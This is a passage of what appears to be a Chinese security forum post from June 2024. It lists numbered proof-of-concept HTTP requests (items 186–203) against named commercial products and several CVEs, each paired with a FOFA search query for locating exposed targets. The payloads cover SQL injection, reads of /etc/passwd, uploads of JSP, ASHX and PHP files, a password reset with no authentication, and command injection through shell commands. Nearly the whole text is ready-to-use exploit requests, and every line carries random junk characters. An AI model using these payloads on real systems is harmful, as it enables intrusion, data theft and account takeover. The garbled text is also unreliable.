1 u& @1 L: {9 m8 K; n4 XFOFA:app="REALOR-天翼应用虚拟化系统"" ], ~: k7 d Z& A4 F% G' K
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.15 P/ q& I) N, w( `; b: Q( a! C/ f& `
Host: host5 W f- W4 H/ d2 p# I: O
8 r( e% k0 ^7 ~# Q- R6 I7 S
- [3 |. j1 f! e% Q0 b. e! R+ T186. F-logic DataCube3 SQL注入
7 X2 q; F% [ L- E* v$ d! C) R: D. y5 ~CVE-2024-31750
, | t6 q! t' D% QF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 a7 I& {) s0 n- h) n. ^7 n% sFOFA:title=="DataCube3"0 f7 ^- i2 e0 G& u2 M% e1 r& i4 `
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1# P* w+ Y. i3 g! e0 }( z; m6 H
Host: your-ip
! ?2 F9 H6 \( g$ x$ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
, y x: Q! H1 s4 R9 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8! u/ C/ L- I0 ^4 T: [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! C5 ?6 G" f: u+ h/ qAccept-Encoding: gzip, deflate; x% Y3 x! H S1 a( Y
Connection: close
6 x+ M8 x4 ]( p- J0 M9 F0 A0 E: B; lContent-Type: application/x-www-form-urlencoded
2 Q) B2 @. |, E2 Y3 |: x, \
4 q, [7 T5 K" X5 A/ d2 c& jreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
2 G# q( Z+ S; H% J- o3 ~: C0 R1 W# _) m, P1 G- V) `
& j8 H Q* y: a/ l
187. Mura CMS processAsyncObject SQL注入
! Q" T( x- e K0 K. C/ VCVE-2024-32640
1 O+ V% \9 Y% Z3 r, }FOFA:"Mura CMS"6 l1 R1 s8 b9 q3 ?* u) X
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.14 x8 C1 q9 w3 V$ O$ {/ P
Host: your-ip
. H4 m- }3 p+ m3 e+ {% v' U8 \% LContent-Type: application/x-www-form-urlencoded9 r# }4 n" n+ Y9 f
, v0 r6 Q! `! H' [* A
( _' u; G% H- a+ \object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1- |, `) `8 c; Q2 n2 Y Y: @6 I
: P% Y$ _5 P6 `' w4 F& V
9 k" z3 S1 E8 _3 Z188. 叁体-佳会视频会议 attachment 任意文件读取
' E- B* a8 _% R/ r6 M5 f8 Oversion <= 3.9.7% T; l, C/ C; d6 ^
FOFA:body="/system/get_rtc_user_defined_info?site_id"
* w% q: F; R- s9 X% [GET /attachment?file=/etc/passwd HTTP/1.1
# c5 s" [+ F: dHost: your-ip
$ ?0 s5 y. f# S, V' zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ p1 V O+ K' X. h8 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 X4 `" j- ~' w0 _# t/ D6 f
Accept-Encoding: gzip, deflate& j4 W+ v- U0 y5 j; B
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 i3 M3 ^# ~$ zConnection: close( M9 I1 ]8 w( j
& F# {: L% P% G9 t/ D' y l
/ {3 z. N. d4 @9 C5 I0 c3 A
189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 d) J `$ W m3 }7 {+ J
FOFA:app="LANWON-临床浏览系统"7 u& G5 ?' _: P( q- _$ \: Z
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 z' j' }0 e4 c$ h7 W
Host: your-ip# c0 R# j4 }. p& R& [
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 p# k; _8 ?2 U, m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 S! l' z, t5 HAccept-Encoding: gzip, deflate+ T0 D5 C& k3 B( j: K
Accept-Language: zh-CN,zh;q=0.96 k/ k, j, t" w
Connection: close" p$ i3 S A! L" C; ^
7 `8 c% i" v5 O, ~
) h& q, O6 \8 w( e1 j. @190. 短视频矩阵营销系统 poihuoqu 任意文件读取7 t# @) `" U/ c9 J0 Y8 q
FOFA:title=="短视频矩阵营销系统", b" a! Y' _( [& u. U4 k
POST /index.php/admin/Userinfo/poihuoqu HTTP/2' _9 |) {4 j# K, \ _" O
Host: your-ip
9 [0 z, q' s6 {3 s) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; h# a: i% T( b+ v% I4 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) w/ N5 p: D* p
Content-Type: application/x-www-form-urlencoded
* I1 Y. E( R1 u+ JAccept-Encoding: gzip, deflate: W1 M& R, A% M. s, o+ K
Accept-Language: zh-CN,zh;q=0.9" }$ f) v' C# f( g
7 o7 @6 k1 Z& i4 X0 |
poi=file:///etc/passwd
8 X3 N. ]9 T* e5 D' T! C
1 D) m m, `& d3 W; w
. t5 z. L6 R9 E- i: d& T N191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
7 S E; A5 j% M2 E/ H' eFOFA:body="/CDGServer3/index.jsp"# ?! @' D4 a1 `1 u6 |/ y8 o0 b) B8 G
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
( V0 ]4 {* x1 VHost: your-ip8 K, l& w; F. `5 L- O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' d5 Y1 T# }2 V' NContent-Type: application/x-www-form-urlencoded4 n* r! k' P B. h% _ s4 X
; a l+ [7 l: D& Lcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
1 J, F7 u1 O/ c, f- ]2 l
% s" u v; Y- D3 X! J% o2 X
6 W" T! D1 |% t192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
" ^2 `: C! B$ ~8 VFOFA:title="用户登录_富通天下外贸ERP"" T" G% M( `0 u; y. i) `
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
4 w9 j' Q" L6 ]9 c/ G5 ]Host: your-ip6 S* l* A+ M* O7 r; Z/ J) Z; ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) f% B* c/ e" lContent-Type: application/x-www-form-urlencoded
( |( F5 x9 `& j8 ~ G* L% M- A" Z8 m/ @& A7 S% a5 j5 l1 ^2 Y" C
# H: r" q7 `) E& S+ ?6 ?" g: \0 z2 r0 ?& l
<% @ webhandler language="C#" class="AverageHandler" %>
& L" l6 o) o# \2 [using System;0 e7 x, `, m: @* c$ T
using System.Web;
$ a: a9 Y0 B( U) w$ v4 Jpublic class AverageHandler : IHttpHandler
9 k: o9 V% }$ q4 w, ^& Y" H{9 y+ R5 \' i) b; V% {% l$ r; l
public bool IsReusable
# l7 i7 d' V7 k3 W3 J# K{ get { return true; } }3 f8 z7 Z, ~3 X( E
public void ProcessRequest(HttpContext ctx)3 L6 |$ ^( M! A/ r% _3 U
{
) N3 e( m: u# K# X. Zctx.Response.Write("test");
1 K7 {( O+ T$ Z6 _% S3 T}
0 _! ^- f3 L* o" k) W}
. |* ]/ h( V ?9 o
8 E. e5 }9 r1 Q: b' ~5 b) i' s7 w" r3 X. g, f; A; X1 Q% x% |
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
5 {# ^" W: N( ?3 \& e& YFOFA:body="山石云鉴主机安全管理系统"/ c& R. b2 n# ~ p# o. t
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
( ~; _: Z0 D. c& xHost:
0 u5 h% a* W# o& J* DCookie: PHPSESSID=2333333333333;
0 t% r2 n( G d% U! NContent-Type: application/x-www-form-urlencoded |0 n+ k+ i( F ]' i# M) h2 t
User-Agent: Mozilla/5.0
, [# o( Q% P4 P7 G1 C' J/ I" J8 X' C w
9 v' w- q7 U6 a8 _1 q& uPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
- R5 ~" h- h6 k$ K) |. l8 FHost:1 X3 n) v' f2 x: c
User-Agent: Mozilla/5.0
' t- F7 ?! }" d: eAccept-Encoding: gzip, deflate1 W; a3 D4 {/ z4 s$ D- }2 a* a8 }
Accept: */*
8 J* Z" [+ p' K( c G0 xConnection: close
8 u# G4 n5 _. z1 [$ S2 T; [Cookie: PHPSESSID=2333333333333;
( ~3 |7 R5 F O$ @Content-Type: application/x-www-form-urlencoded
: _$ Q0 |5 S) J6 Z2 K1 HContent-Length: 840 K( B/ U# P1 \6 H0 O* Z
+ t, G7 |6 n7 Q2 m8 @( Mparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'): M5 ~" M, Z7 U1 d
/ U: V8 q" z. k1 c! q0 u! t* R, p3 S) g, l; L* W. [
GET /master/img/config HTTP/1.1/ g( E/ V9 u4 K4 B" t
Host:
( S3 I. S# b) @/ o, f& m; |User-Agent: Mozilla/5.04 r% x, B5 I5 t+ Z! R- W( c
3 ~* S3 y. f D5 g, J& S4 ]8 z
. R3 [9 p8 k: P( f
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
. ?" ?) u; c; c; `2 i1 lFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在4 ^( r8 _1 s" `" G7 U/ U
" H! j1 _ _' d* B/ W! Z# {+ d% Y2 [POST /servlet/uploadAttachmentServlet HTTP/1.1
3 H( b% p7 e$ @2 k, tHost: host1 A& ~" B S1 x0 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36; ]: \, Q% l. @3 o/ j4 V) x$ K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ o) e: @$ e) NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; a) Q4 ~) c+ r9 |9 @Accept-Encoding: gzip, deflate
& {2 m; H2 v7 h7 [9 \. iConnection: close
5 F# `5 s* t. d: NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
! |( }1 F( A+ b( P+ x$ _------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 k/ o. E9 c% T. Q$ e" L) i
- J O) H0 b3 L ~4 @5 T" D5 y$ l3 r, e$ g
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"4 m3 ~6 x1 i; S& r/ L) Q: ?4 P
Content-Type: text/plain% L6 [1 k3 O5 x# s3 x4 l
<% out.println("hello");%>- G2 r5 R. ?6 j' U' K9 J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
4 q4 Q3 y7 n3 o4 Z: J, |( {0 GContent-Disposition: form-data; name="json". ~1 g8 w+ b8 M0 f- ~
{"iq":{"query":{"UpdateType":"mail"}}}! ?5 M# E8 L+ \2 r
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--4 m y. Y ^7 \; A
- B: H+ y2 r0 X5 f
7 \6 d; ^! o5 q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行' r, c3 W( z, p( ?
FOFA:title=="飞鱼星企业级智能上网行为管理系统1 w/ r7 J" ~; z% g% G8 l! _
POST /send_order.cgi?parameter=operation HTTP/1.1
- e7 ?' G" n; T; {- S$ Z. NHost: 127.0.0.1/ ?" h% ?$ s/ i3 N% R9 u7 K, t+ }
Pragma: no-cache
, [+ e, C. h) t2 Z: S8 qCache-Control: no-cache( g2 A! {$ H, U! n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 W& {7 Z# D" V7 M" A6 u2 d+ Y
Accept: */*9 [3 a4 G I9 R/ f5 }' I: Z
Accept-Encoding: gzip, deflate' o8 A- H5 r" j% y
Accept-Language: zh-CN,zh;q=0.9' c! v8 N4 L0 B) ~, N- D
Connection: close# P1 e1 ?; p5 M( k S
Content-Type: application/x-www-form-urlencoded7 ~1 L1 S8 ~4 y' N, h; |6 O
Content-Length: 68
8 s. f/ ~/ m) L4 u, P* R3 n( w$ C; l, B0 E& d) {
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 u; i3 p c; E f0 Q L0 Q- r
7 O5 d, K. u0 B z1 c o" s% o, S5 H% b4 J9 H
196. 河南省风速科技统一认证平台密码重置
0 S6 T% ]1 i: k8 \6 o5 D fFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
* P$ q) T) _, ^, o' F6 r" oPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
+ r* j, [6 @6 H9 c1 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
3 h1 r o! h1 S } bContent-Type: application/json;charset=UTF-8
/ o3 |7 V( j4 _X-Requested-With: XMLHttpRequest
# B& @4 N* n% V9 M0 z# V/ kHost:
. R# x: S8 ?$ j0 f) ~1 xAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2, q' Q8 C' Z k, f9 U. B% N
Content-Length: 45
8 S3 i% F) c6 bConnection: close9 }! Y0 N4 o$ l: g1 A" k* {4 Z V
% p" W& Z! ~4 H4 [+ c/ y* E{"xgh":"test","newPass":"test666","email":""}
" {5 O' o9 S# q1 e# W9 f4 a- W
; E- B7 M( o' W: w: O1 f3 F4 t7 H- C8 n) [2 Y5 E/ n; g. m( J
! b5 \0 x3 G+ \; q
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入( G& ]" ]7 P# n% t/ O) Y- `
FOFA:app="浙大恩特客户资源管理系统"
; X) C0 N- H% q7 |3 r' JGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
( f9 E9 L" d2 m) n! D6 R' t( `; r9 CHost:
# q, c' \! u3 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
8 \6 w7 D) w1 |Accept-Encoding: gzip, deflate* [% n0 H4 ?: Q7 Y
Connection: close0 W, t( N" X6 P
, Z2 ?6 C: ^) n, Q3 E; Y0 p. E' e( \* |; E
8 d& N5 }% c G6 N+ w, J# X# M0 z
198. 阿里云盘 WebDAV 命令注入
) P( q* Y4 v: v& DCVE-2024-29640
3 ?0 X4 m+ P# c9 }' I; \3 ]GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
% V1 E5 l- ^2 Y( l9 O' XCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
) u9 Q, T Q5 w6 o) ^8 ]Accept: */*
5 E4 c) H% D- kAccept-Encoding: gzip, deflate
, X! ~! w1 s h( [! X9 H' qAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
. i( G3 ^6 {4 r& Z, Y, HConnection: close) D" H8 A1 U5 I c& Z
' s+ O N7 v9 F3 ^: P4 o* a
; Y# H9 R. }! z199. cockpit系统assetsmanager_upload接口 文件上传
7 X7 N' w/ y1 M$ P$ i9 k2 ] B8 n B$ Q8 y! H( U* {3 W7 V
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
' c* s7 i8 ^ y% _, m2 iGET /auth/login?to=/ HTTP/1.1
( ?; q. k; y- z% [* N) x L& f' s! U9 G3 @1 ~- `
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"2 G4 o( G' @' G2 ]" W
/ [' |# v- }+ A& S) m+ `
2.使用刚才上一步获取到的jwt获取cookie:
% {) _, A; j1 d" _
|7 o* i) n* c, N8 l# ~8 WPOST /auth/check HTTP/1.1
/ A2 G1 D: M& @3 i9 N1 Z' l* M7 }' eContent-Type: application/json
5 s4 K# R) ^8 l/ ~$ E, @* l
( F. P2 Q0 X% s8 D3 b9 z6 G{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
) p4 g3 O9 F: Y2 i: Z' k; @$ f/ S/ [! S. r9 C: |
响应:200,返回值:
0 o8 C" c. [2 A# OSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
7 g- a. |6 p# E; o; m5 h) P9 X! xFofa:title="Authenticate Please!"
" S+ I" e5 ?6 V5 X9 rPOST /assetsmanager/upload HTTP/1.1
/ s- k5 z4 |+ L1 f! |Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3; M5 n$ g2 Z- V2 B
Cookie: mysession=95524f01e238bf51bb60d77ede3bea922 R2 j0 `2 S$ [/ ^9 ^! K6 L6 p: E
. E7 q) \' T7 a
-----------------------------36D28FBc36bd6feE7Fb32 M, z2 w j+ _! M" Z$ r; h* m9 m& H
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
V$ T6 ? x3 J' U0 C4 U3 m9 RContent-Type: text/php
3 Y; T: d) \% m9 E+ C8 {* Q% b
4 Q/ A6 ]7 q- n$ x. y5 R7 B<?php echo "tttt";unlink(__FILE__);?>
0 F+ A& g& N( p3 M A/ G7 P7 E-----------------------------36D28FBc36bd6feE7Fb3
* p2 ]' v# ]3 @: ^ uContent-Disposition: form-data; name="folder"8 J! ]$ n$ T! @9 S9 T2 r
8 T: ?- A5 R j9 Z-----------------------------36D28FBc36bd6feE7Fb3--
: J1 m/ |7 }& q
0 I# j( R$ X @* D% R5 Q. a! z/ k! |- a' _" i! H4 \+ H
/storage/uploads/tttt.php. l$ i- T% ^. J4 n8 c/ W: X' v( H
3 I5 w6 ?9 M0 F
200. SeaCMS海洋影视管理系统dmku SQL注入
3 o2 ~5 F1 O8 C8 W; B, _FOFA:app="海洋CMS"% c: ?( e0 o7 n2 A& s
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1& \4 I. Z1 A3 ~2 t& \9 j; r+ i, I
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
5 M; b! d2 Y4 V" i5 j( P; ?0 \: cUpgrade-Insecure-Requests: 1
- c4 J. u1 B% t8 f3 H8 i) FCache-Control: max-age=0$ h4 P! F0 b8 j4 h" k O1 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 S& K" d1 n/ wAccept-Encoding: gzip, deflate
: w, U1 ^5 n9 tAccept-Language: zh-CN,zh;q=0.97 ]* s" _2 L. G" ~% M
+ e& z8 \& I% d- ~8 A" I) O6 ~% v
201. 方正全媒体新闻采编系统 binary SQL注入6 A- @5 O4 \ o6 w9 _, F
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
- r1 a1 \, Y2 UPOST /newsedit/newsplan/task/binary.do HTTP/1.11 P/ ?( _& C ]! r7 f
Content-Type: application/x-www-form-urlencoded* J% H1 H! T1 m# B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 s: ]# o( L1 L+ X8 WAccept-Encoding: gzip, deflate
% G, |, t5 `# P& c8 V" GAccept-Language: zh-CN,zh;q=0.92 k1 |+ I k2 D' Q
Connection: close
) R- J! M' f6 N( o# a% `( m( g* ?# s/ \% y
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=15 ^( Z' f, f& P$ M6 l, {
. j: ]! K2 Y/ x: R1 X4 S4 [& d9 }1 Z; u; M+ }/ ]6 q+ {$ K/ ~
202. 微擎系统 AccountEdit任意文件上传2 J) v8 G1 T+ s( Z
FOFA:body="/Widgets/WidgetCollection/"
& g& Z6 Q$ L" |! u5 @0 Q B' H获取__VIEWSTATE和__EVENTVALIDATION值9 @/ H u% J+ Z( [% K4 X+ v6 y
GET /User/AccountEdit.aspx HTTP/1.12 [; u, O# e, t) h ]! e
Host: 滑板人之家" ?! k0 a9 F% ?) Q3 Q9 \; E M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: o* v, }% I: f8 m
Content-Length: 0, t/ h( L; v9 K7 h5 Q p
j' O0 z6 U ^* z/ l. h* Y* d6 Q+ Y
替换__VIEWSTATE和__EVENTVALIDATION值
1 h- s5 ]4 K& SPOST /User/AccountEdit.aspx HTTP/1.1
. y# f* R# ~! ~& b7 \& L- pAccept-Encoding: gzip, deflate, br
2 H9 ^( ~* S; E8 T$ V" DContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 ]# h: Y/ |/ [+ k3 g
* ?, p7 y/ r* E2 F4 i# K-----------------------------786435874t38587593865736587346567358735687, H( `# B, A9 _7 |# L" B% x3 a4 @8 J ~
Content-Disposition: form-data; name="__VIEWSTATE"5 m! T4 Q o: D1 ~: I B
4 R' P3 w/ { ~8 E( R/ y. K
__VIEWSTATE
7 r; [3 _2 w- q {9 C) W# L-----------------------------786435874t38587593865736587346567358735687
: p* [. U) {1 EContent-Disposition: form-data; name="__EVENTVALIDATION"4 {' Q5 U& J8 y1 _3 R
3 i9 I/ a, k# b
__EVENTVALIDATION5 Q9 v2 m/ J) K: u
-----------------------------786435874t38587593865736587346567358735687# b* D8 ]/ c# p1 W- R/ O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"9 R8 ?2 Z" L, Q1 S
Content-Type: text/plain+ ^) q7 U, p% [
6 L* P+ P M2 bHello World!- O/ V! `! W: ^$ @
-----------------------------786435874t38587593865736587346567358735687
" g1 I8 A" j7 G) q, c* Q/ |Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
. l; H( _* _. h h
$ ^) t1 s8 v8 B! ]上传图片! E" R- D i1 t1 g* r: d* K
-----------------------------786435874t38587593865736587346567358735687
& P" [1 w# E: m) OContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
0 Q/ g3 @6 D: b3 \) L' x9 V8 e5 @1 o$ Z) b7 o8 Z7 T
/ D" U" o8 j% z3 Q; u-----------------------------786435874t385875938657365873465673587356870 C+ j. ]" H* z4 s/ r
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
$ q- `: O9 J% M& y8 B9 V, L
7 H$ {! h a+ M7 O2 x" W9 a$ n
: y8 ?7 E1 W) ?5 v-----------------------------786435874t38587593865736587346567358735687--
$ F, H, x- m4 d2 y
u8 Q$ P' _) n8 F+ V+ R
) C O0 F$ ?7 A6 K( G& `8 L/_data/Uploads/1123.txt# H" C" F. Q8 T5 b( j
+ t% d2 D/ h+ c. p
203. 红海云EHR PtFjk 文件上传, g" J- w2 W$ z7 u& G
FOFA:body="RedseaPlatform"$ n7 x C+ S* U4 n
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" e' I$ T" x; [( u9 d* O
Host: x.x.x.x
) H, k5 V6 [4 ?$ }7 n8 k: o: p! GAccept-Encoding: gzip
+ |2 |+ X9 V2 t) B/ EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' {& N6 z) t: ?7 U/ P- _8 y3 T. MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys45 q& f- A; C$ A; `: f( J
Content-Length: 2103 ]2 C% u3 o' R
4 z. k- m# c6 p( e------WebKitFormBoundaryt7WbDl1tXogoZys4
$ |- h; Y: b2 v2 r; v- OContent-Disposition: form-data; name="fj_file"; filename="11.jsp"! t9 O2 Q% @, l) w3 p
Content-Type:image/jpeg
. f7 _- _; h ^/ [+ I
$ Y t w" h I2 o<% out.print("hello,eHR");%>
# k: j5 P5 J: q7 Y) i% b------WebKitFormBoundaryt7WbDl1tXogoZys4--
|" l. D* \( a* A8 E$ x3 a" K+ z2 I. x( n0 _
6 u+ i4 Q7 j* c0 S% q: x) H
- T! o5 ~9 O7 q) I% b! T6 R a4 l4 a }# t
: n8 L9 P$ X5 q/ [$ e; H
% E) q6 A% s7 K |
发表于 2024-6-5 14:31:29
收藏
支持
反对